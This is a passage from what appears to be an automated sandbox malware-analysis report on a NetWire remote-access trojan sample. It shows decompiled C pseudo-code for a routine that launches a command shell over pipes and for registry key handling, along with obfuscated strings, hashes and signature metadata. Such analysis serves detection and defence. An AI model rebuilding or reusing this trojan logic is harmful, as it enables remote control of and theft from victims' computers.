                                                          							__eax = _v616;
                                                          							_v660 = _v616;
                                                          							__eax = _v44;
                                                          							_v668 = _v44;
                                                          							__eax = _v624;
                                                          							 *__esp = __eax;
                                                          							L0041F41C();
                                                          							__esp = __esp - 0x18;
                                                          							if(__eax != 0) {
                                                          								goto L21;
                                                          							}
                                                          							__eax = _v648;
                                                          							_v692 = __ebp;
                                                          							 *__esp = __eax;
                                                          							L0041F444();
                                                          							_push(__edx);
                                                          							_push(__edx);
                                                          							__ebx = 0 | __eax == 0x00000000;
                                                          							L24:
                                                          							 &_v636 = E00407F59( &_v636);
                                                          							goto L25;
                                                          						}
                                                          						L21:
                                                          						__ebx = 0;
                                                          						goto L24;
                                                          				}
                                                          			}

                                                          Instruction addresses (address column of the listing above, 0x00410fc8 through 0x004113b6; the corresponding instruction text was not preserved in extraction)

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %c%.8x%s$%c%.8x%s%s$%c%.8x%s\%s$?
                                                          • API String ID: 0-1127014073
                                                          • Opcode ID: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                                                          • Instruction ID: 5e49c9d9379b1dd87b15daa38270e0e0a3fc6f91244b4719e2a77dc22190009b
                                                          • Opcode Fuzzy Hash: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                                                          • Instruction Fuzzy Hash: DAB1CFB0909345AFD700EF69D18469FFBE4BF84744F40892EF99887311D7B8D5898B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E004113B8(void* __eax, void* __ecx, char* __edx, void* __eflags, char** _a4) {
                                                          				char _v544;
                                                          				intOrPtr _v584;
                                                          				intOrPtr _v588;
                                                          				intOrPtr _v592;
                                                          				short _v600;
                                                          				intOrPtr _v604;
                                                          				char _v612;
                                                          				char _v628;
                                                          				char* _v632;
                                                          				char* _v636;
                                                          				char _v640;
                                                          				char _v656;
                                                          				char _v660;
                                                          				char _v668;
                                                          				intOrPtr _v672;
                                                          				char* _v688;
                                                          				intOrPtr _v692;
                                                          				char* _v720;
                                                          				intOrPtr _v724;
                                                          				char* _v728;
                                                          				char* _v732;
                                                          				char* _v736;
                                                          				char* _v740;
                                                          				char* _v744;
                                                          				char* _v748;
                                                          				char* _v752;
                                                          				char* _v756;
                                                          				char* _v760;
                                                          				char* _v764;
                                                          				char* _v768;
                                                          				char _v772;
                                                          				intOrPtr _v776;
                                                          				char* _v796;
                                                          				intOrPtr _v800;
                                                          				char* _v804;
                                                          				char* _v808;
                                                          				char* _v812;
                                                          				char* _v824;
                                                          				intOrPtr _v828;
                                                          				char* _v832;
                                                          				char* _v836;
                                                          				char* _v844;
                                                          				char* _v848;
                                                          				intOrPtr _v852;
                                                          				char* _v856;
                                                          				void* _t85;
                                                          				char* _t92;
                                                          				char* _t93;
                                                          				intOrPtr _t94;
                                                          				intOrPtr _t95;
                                                          				char* _t100;
                                                          				char* _t102;
                                                          				void* _t106;
                                                          				char* _t110;
                                                          				char** _t118;
                                                          				void* _t119;
                                                          				char* _t120;
                                                          				char* _t121;
                                                          				char* _t122;
                                                          				char* _t123;
                                                          				char* _t125;
                                                          				char* _t126;
                                                          				char* _t127;
                                                          				char** _t128;
                                                          				void* _t129;
                                                          				void* _t130;
                                                          				void* _t131;
                                                          				char** _t132;
                                                          
                                                          				_t120 = __edx;
                                                          				_t119 = __ecx;
                                                          				_t125 =  &_v544;
                                                          				_v732 = "ComSpec";
                                                          				_t118 = _a4;
                                                          				L0041F724();
                                                          				E004127A8(_t125, 0x204, "%s", __eax);
                                                          				_t85 = E00406F1A(_t120, _t125);
                                                          				if(_t85 == 0) {
                                                          					_v732 = "WINDIR";
                                                          					L0041F724();
                                                          					E004127A8(_t125, 0x204, E004081AA("%6\\6Z65dlNh\\YlS.dfd"), _t85);
                                                          				}
                                                          				if(E00406F1A(_t120, _t125) == 0) {
                                                          					L6:
                                                          					_v720 = 0;
                                                          					L7:
                                                          					return E00405D7D(_t120,  *_t118, 0xb9, 0);
                                                          				}
                                                          				_t122 =  &_v612;
                                                          				_t127 =  &_v628;
                                                          				_v724 = 0x44;
                                                          				_v728 = 0;
                                                          				_v636 = 0;
                                                          				_v732 = _t122;
                                                          				_v632 = 1;
                                                          				E004129E4();
                                                          				E004129E4(_t127, 0, 0x10);
                                                          				_t121 =  &_v640;
                                                          				_v720 = 0;
                                                          				_v728 =  &_v656;
                                                          				_t92 =  &_v660;
                                                          				_v724 = _t121;
                                                          				_v672 = _t121;
                                                          				_v732 = _t92;
                                                          				L0041F674();
                                                          				_t130 = _t129 - 0x10;
                                                          				_t120 = _v688;
                                                          				_v736 = 0;
                                                          				if(_t92 == 0) {
                                                          					goto L7;
                                                          				}
                                                          				_t93 =  &_v668;
                                                          				_v740 = _t120;
                                                          				_v744 = 0x42b5d4;
                                                          				_v748 = _t93;
                                                          				L0041F674();
                                                          				_t131 = _t130 - 0x10;
                                                          				if(_t93 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_v764 = _t122;
                                                          				L0041F59C();
                                                          				_push(_t93);
                                                          				_t94 = _v692;
                                                          				_v732 = _t127;
                                                          				_v736 = _t122;
                                                          				_v584 = _t94;
                                                          				_v588 = _t94;
                                                          				_t95 = _v688;
                                                          				_v740 = 0;
                                                          				_v744 = 0;
                                                          				_v748 = 0;
                                                          				_v752 = 1;
                                                          				_v756 = 0;
                                                          				_v760 = 0;
                                                          				_v764 = _t125;
                                                          				_v768 = 0;
                                                          				_v592 = _t95;
                                                          				_v604 = 0x101;
                                                          				_v600 = 0;
                                                          				L0041F66C();
                                                          				_t132 = _t131 - 0x28;
                                                          				if(_t95 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_v808 = _v732;
                                                          				L0041F694();
                                                          				_push(_t122);
                                                          				_t123 = 0;
                                                          				_v812 = _v732;
                                                          				L0041F694();
                                                          				_push(_t127);
                                                          				_v804 = 0xffffffff;
                                                          				_v808 = _t125;
                                                          				_t128 =  &_v728;
                                                          				_v812 = 0xb6;
                                                          				_v732 = 0;
                                                          				 *_t132 =  *_t118;
                                                          				E00405D7D(_t120);
                                                          				while(1) {
                                                          					_t100 = _v744;
                                                          					_v796 = 0;
                                                          					_v800 = _t128;
                                                          					_v804 = 0;
                                                          					_v808 = 0;
                                                          					_v812 = 0;
                                                          					 *_t132 = _t100;
                                                          					_v728 = 0;
                                                          					L0041F534();
                                                          					_t132 = _t132 - 0x18;
                                                          					if(_t100 == 0) {
                                                          						goto L17;
                                                          					}
                                                          					L10:
                                                          					_t126 = _v752;
                                                          					if(_t126 != 0 &&  *0x42b5d0 != 0) {
                                                          						if(_t123 >= _t126) {
                                                          							L15:
                                                          							_v824 = 0;
                                                          							_v828 = _t128;
                                                          							_v832 = _t126;
                                                          							_v836 = _v756;
                                                          							_t110 = _v768;
                                                          							 *_t132 = _t110;
                                                          							L0041F51C();
                                                          							_t132 = _t132 - 0x14;
                                                          							if(_t110 != 0) {
                                                          								_v856 = 0xb7;
                                                          								_v848 = _v772;
                                                          								_v852 = _v776;
                                                          								 *_t132 =  *_t118;
                                                          								if(E00405D7D(_t120) + 1 != 0) {
                                                          									while(1) {
                                                          										_t100 = _v744;
                                                          										_v796 = 0;
                                                          										_v800 = _t128;
                                                          										_v804 = 0;
                                                          										_v808 = 0;
                                                          										_v812 = 0;
                                                          										 *_t132 = _t100;
                                                          										_v728 = 0;
                                                          										L0041F534();
                                                          										_t132 = _t132 - 0x18;
                                                          										if(_t100 == 0) {
                                                          											goto L17;
                                                          										}
                                                          										goto L10;
                                                          									}
                                                          								}
                                                          								goto L17;
                                                          							}
                                                          						} else {
                                                          							 *_t132 = _t126;
                                                          							L0041F714();
                                                          							_v756 = _t100;
                                                          							if(_t100 != 0) {
                                                          								_t123 = _t126;
                                                          								goto L15;
                                                          							}
                                                          						}
                                                          					}
                                                          					L18:
                                                          					if( *0x42b5d0 != 0) {
                                                          						 *_t132 = 0x96;
                                                          						E00407EF4();
                                                          						continue;
                                                          					}
                                                          					_t102 = _v768;
                                                          					 *_t132 = _t102;
                                                          					L0041F694();
                                                          					_push(_t102);
                                                          					_v844 =  *0x42b5d4;
                                                          					L0041F694();
                                                          					_v844 = 0;
                                                          					_v848 = _v744;
                                                          					L0041F4E4();
                                                          					_v844 = 0;
                                                          					_v848 = 0;
                                                          					_v852 = 0xb8;
                                                          					_v856 =  *_t118;
                                                          					_t106 = E00405D7D(_t120, _t119, _t119, _t120);
                                                          					if(_v772 != 0) {
                                                          						return E00407F59( &_v772);
                                                          					}
                                                          					return _t106;
                                                          					L17:
                                                          					 *0x42b5d0 = 0;
                                                          					goto L18;
                                                          				}
                                                          			}
                                                          0x004113b8
                                                          0x004113b8
                                                          0x004113c2
                                                          0x004113c9
                                                          0x004113d0
                                                          0x004113d7
                                                          0x004113f3
                                                          0x004113fb
                                                          0x00411402
                                                          0x00411404
                                                          0x0041140b
                                                          0x00411431
                                                          0x00411431
                                                          0x00411440
                                                          0x0041157a
                                                          0x0041157a
                                                          0x00411582
                                                          0x00000000
                                                          0x00411597
                                                          0x00411446
                                                          0x0041144a
                                                          0x0041144e
                                                          0x00411456
                                                          0x0041145e
                                                          0x00411466
                                                          0x00411469
                                                          0x00411471
                                                          0x00411489
                                                          0x00411492
                                                          0x00411496
                                                          0x0041149e
                                                          0x004114a2
                                                          0x004114a6
                                                          0x004114aa
                                                          0x004114ae
                                                          0x004114b1
                                                          0x004114b6
                                                          0x004114bb
                                                          0x004114bf
                                                          0x004114c7
                                                          0x00000000
                                                          0x00000000
                                                          0x004114cd
                                                          0x004114d1
                                                          0x004114d5
                                                          0x004114dd
                                                          0x004114e0
                                                          0x004114e5
                                                          0x004114ea
                                                          0x00000000
                                                          0x00000000
                                                          0x004114f0
                                                          0x004114f3
                                                          0x004114f8
                                                          0x004114f9
                                                          0x004114fd
                                                          0x00411501
                                                          0x00411505
                                                          0x0041150c
                                                          0x00411513
                                                          0x00411517
                                                          0x0041151f
                                                          0x00411527
                                                          0x0041152f
                                                          0x00411537
                                                          0x0041153f
                                                          0x00411547
                                                          0x0041154b
                                                          0x00411552
                                                          0x00411559
                                                          0x00411564
                                                          0x0041156e
                                                          0x00411573
                                                          0x00411578
                                                          0x00000000
                                                          0x00000000
                                                          0x004115a5
                                                          0x004115a8
                                                          0x004115ad
                                                          0x004115b2
                                                          0x004115b4
                                                          0x004115b7
                                                          0x004115bc
                                                          0x004115bd
                                                          0x004115c5
                                                          0x004115c9
                                                          0x004115cd
                                                          0x004115d7
                                                          0x004115df
                                                          0x004115e2
                                                          0x004115e7
                                                          0x004115e7
                                                          0x004115eb
                                                          0x004115f3
                                                          0x004115f7
                                                          0x004115ff
                                                          0x00411607
                                                          0x0041160f
                                                          0x00411612
                                                          0x0041161a
                                                          0x0041161f
                                                          0x00411624
                                                          0x00000000
                                                          0x00000000
                                                          0x00411626
                                                          0x00411626
                                                          0x0041162c
                                                          0x00411639
                                                          0x0041164d
                                                          0x00411651
                                                          0x00411659
                                                          0x0041165d
                                                          0x00411661
                                                          0x00411665
                                                          0x00411669
                                                          0x0041166c
                                                          0x00411671
                                                          0x00411676
                                                          0x0041167c
                                                          0x00411684
                                                          0x0041168c
                                                          0x00411692
                                                          0x0041169b
                                                          0x004115e7
                                                          0x004115e7
                                                          0x004115eb
                                                          0x004115f3
                                                          0x004115f7
                                                          0x004115ff
                                                          0x00411607
                                                          0x0041160f
                                                          0x00411612
                                                          0x0041161a
                                                          0x0041161f
                                                          0x00411624
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00411624
                                                          0x004115e7
                                                          0x00000000
                                                          0x0041169b
                                                          0x0041163b
                                                          0x0041163b
                                                          0x0041163e
                                                          0x00411645
                                                          0x00411649
                                                          0x0041164b
                                                          0x00000000
                                                          0x0041164b
                                                          0x00411649
                                                          0x00411639
                                                          0x004116ab
                                                          0x004116b2
                                                          0x0041171c
                                                          0x00411723
                                                          0x00000000
                                                          0x00411723
                                                          0x004116b4
                                                          0x004116b8
                                                          0x004116bb
                                                          0x004116c0
                                                          0x004116c6
                                                          0x004116c9
                                                          0x004116d3
                                                          0x004116db
                                                          0x004116de
                                                          0x004116e5
                                                          0x004116ed
                                                          0x004116f5
                                                          0x004116ff
                                                          0x00411702
                                                          0x0041170c
                                                          0x00000000
                                                          0x00411715
                                                          0x00411737
                                                          0x004116a1
                                                          0x004116a1
                                                          0x00000000
                                                          0x004116a1

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %6\6Z65dlNh\YlS.dfd$ComSpec$D$WINDIR
                                                          • API String ID: 0-1530679608
                                                          • Opcode ID: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                                                          • Instruction ID: c0a2dff8ecfd3ca449ec7184aa16f3f0f3f293b9e2d18e22baf8a99b3bb4e763
                                                          • Opcode Fuzzy Hash: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                                                          • Instruction Fuzzy Hash: F4919EB05087419FD710AF65C18875FBBE4AF84748F01892EE5D88B3A1D7B99489CF8A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MdYQ0Nh.Sii$m6CEd5mWnWRMd664WRaC5C$m6C_0ddrd5Q0RcQ88d0$m6CjRQld0C5dmWnWRMd664WR6
                                                          • API String ID: 0-3174184691
                                                          • Opcode ID: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                                                          • Instruction ID: 94c08b94b57df9e53fa0a2455e2e566f66701f19132ff7a1c430a127e0c0603f
                                                          • Opcode Fuzzy Hash: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                                                          • Instruction Fuzzy Hash: 9761DEB44087109FD710AF26C584A6BBBF4BF88704F01892EE8D897391E7799985CF56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %d:%I64u:%s%s;$%d:%s%s;$%s%s\$%s*
                                                          • API String ID: 0-525976846
                                                          • Opcode ID: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                                                          • Instruction ID: f6b2b9afb8f28ceff06ae1ca88c29ba9ed65548566ee5afaf2077295461a783a
                                                          • Opcode Fuzzy Hash: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                                                          • Instruction Fuzzy Hash: 0971AFB44093459BD320EF6AD18469FBBE0AF84758F008E1EE4D887391D7B89689CF57
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ../nettle-3.5.1/memxor3.c$M$n == 1$n > 0
                                                          • API String ID: 0-17687075
                                                          • Opcode ID: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                                                          • Instruction ID: 88b4d72e3a3b074a803e33dc480ae7ecbd49f2114936249b734713bf6416a905
                                                          • Opcode Fuzzy Hash: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                                                          • Instruction Fuzzy Hash: 0951BB716083A28FC300CF28E59052BBBF1BFCA310F048A1EE69087645D335EA19CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\%s$lWk67i45dN.Sii$lWkQ54i6.Sii$lWkniQd.Sii
                                                          • API String ID: 0-1446494701
                                                          • Opcode ID: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                                                          • Instruction ID: 99cae675b6ce9c0e2fecfda939a24821795d6923156f602411de4cd21c6c0224
                                                          • Opcode Fuzzy Hash: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                                                          • Instruction Fuzzy Hash: D1414BB05083459AC710EF25D58426EBBE0EF91348F41982FE4D8AB382D77D9655CB4F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $@$Password
                                                          • API String ID: 0-2841454644
                                                          • Opcode ID: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                                                          • Instruction ID: 5ee87fdfff2276ed8f5c7cc8756256179826899119173577a518fef8d5e42c6b
                                                          • Opcode Fuzzy Hash: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                                                          • Instruction Fuzzy Hash: 2421EFB0509314AED310AF52D58879BBBE4BF85348F408C2EE4C857281D7B985899BAB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 18%
                                                          			E004089ED(void* __ecx, void* __edx, void* __eflags) {
                                                          				char _v528;
                                                          				char* _v548;
                                                          				char* _v552;
                                                          				void* _t9;
                                                          				void* _t10;
                                                          				char* _t15;
                                                          				char* _t16;
                                                          				char* _t18;
                                                          				void* _t20;
                                                          				void* _t21;
                                                          				char** _t22;
                                                          
                                                          				_t21 = __edx;
                                                          				_t20 = __ecx;
                                                          				 *_t22 = 8;
                                                          				_t9 = E004082E8(__eflags);
                                                          				_t24 = _t9;
                                                          				if(_t9 != 0) {
                                                          					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\U4RSWg6\\PQ00dR5zd064WR\\rQR\\";
                                                          					_t18 = E004081AA();
                                                          					_v548 = 0x4224c8;
                                                          					_v552 = _t18;
                                                          					 *_t22 = 0x80000001;
                                                          					E00410803(_t20, _t21);
                                                          				}
                                                          				 *_t22 = 0x10;
                                                          				_t10 = E004082E8(_t24);
                                                          				_t25 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\DY542d Md5Qs\\XR65CiidS PWlsWRdR56";
                                                          					_t16 = E004081AA();
                                                          					_v548 = 0x4224a0;
                                                          					_v552 = _t16;
                                                          					 *_t22 = 0x80000002;
                                                          					E0041086B(_t20);
                                                          				}
                                                          				 *_t22 = 4;
                                                          				if(E004082E8(_t25) != 0) {
                                                          					_t15 =  *0x42b460;
                                                          					if(_t15 != 0) {
                                                          						 *_t22 = _t15;
                                                          						L0041F78C();
                                                          					}
                                                          				}
                                                          				_v548 = "NetWire";
                                                          				_v552 = "SOFTWARE\\";
                                                          				 *_t22 = 0x80000001;
                                                          				E0041086B(_t20);
                                                          				_v552 = 0x204;
                                                          				 *_t22 =  &_v528;
                                                          				return E00407C77( &_v528);
                                                          			}

                                                          Strings
                                                          • SOFTWARE\, xrefs: 00408A84
                                                          • MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56, xrefs: 00408A37
                                                          • MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\, xrefs: 00408A03
                                                          • NetWire, xrefs: 00408A7C
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$NetWire$SOFTWARE\
                                                          • API String ID: 0-126448098
                                                          • Opcode ID: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                                                          • Instruction ID: bb4ce6ad198e61c342c208a9868e2ee3a63cf1cfb8a338f91740164746fe8c6d
                                                          • Opcode Fuzzy Hash: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                                                          • Instruction Fuzzy Hash: 1101B7B06087119AD700BF65D64526DBBE0AF40348F81C82FE4C86B286DBBD8485DB5F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%